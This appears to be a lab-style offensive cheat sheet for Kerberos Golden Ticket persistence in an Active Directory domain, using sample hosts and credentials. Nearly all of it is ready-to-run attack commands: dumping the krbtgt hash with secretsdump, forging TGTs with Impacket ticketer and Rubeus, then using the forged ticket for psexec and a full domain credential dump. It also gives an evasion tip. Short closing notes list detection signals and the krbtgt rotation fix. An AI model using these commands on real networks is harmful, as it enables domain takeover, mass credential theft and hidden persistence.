Golden Ticket persistence uses the krbtgt key to forge Ticket Granting Tickets. If we have the krbtgt NT hash or AES key and the domain SID, we can create TGTs for arbitrary users and groups without knowing those users' passwords.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export SID='S-1-5-21-1111111111-2222222222-3333333333'
Get domain SID
lookupsid.py "ootw.local/student:student@10.10.10.200" 0
nxc ldap 10.10.10.200 -u student -p 'student' --get-sid
Dump krbtgt
secretsdump.py -just-dc-user krbtgt "ootw.local/Administrator:Password123!@10.10.10.200"
Forge with Impacket
ticketer.py -nthash KRBTGT_NTLM -domain-sid "$SID" -domain "$DOMAIN" Administrator
export KRB5CCNAME=Administrator.ccache
klist
Use forged TGT
psexec.py -k -no-pass "$DOMAIN/Administrator@dc01.$DOMAIN" -dc-ip $DC
secretsdump.py -k -no-pass "$DOMAIN/Administrator@dc01.$DOMAIN" -dc-ip $DC -just-dc
Forge with Rubeus
Rubeus.exe golden /rc4:KRBTGT_NTLM /user:Administrator /domain:ootw.local /sid:S-1-5-21-1111111111-2222222222-3333333333 /ptt
AES option
Rubeus.exe golden /aes256:KRBTGT_AES256 /user:Administrator /domain:ootw.local /sid:S-1-5-21-1111111111-2222222222-3333333333 /ptt
Convert kirbi to ccache
minikerberos-kirbi2ccache golden.kirbi golden.ccache
export KRB5CCNAME=golden.ccache
klist
Notes
- Golden Tickets are domain-wide because
krbtgtsigns TGTs. - The forged user does not have to exist, but using a real user often blends better.
- Modern detection looks at impossible lifetimes, strange group SIDs, missing account correlation, encryption type anomalies, and unusual service access.
- Killing Golden Ticket persistence requires rotating
krbtgttwice after replication is healthy.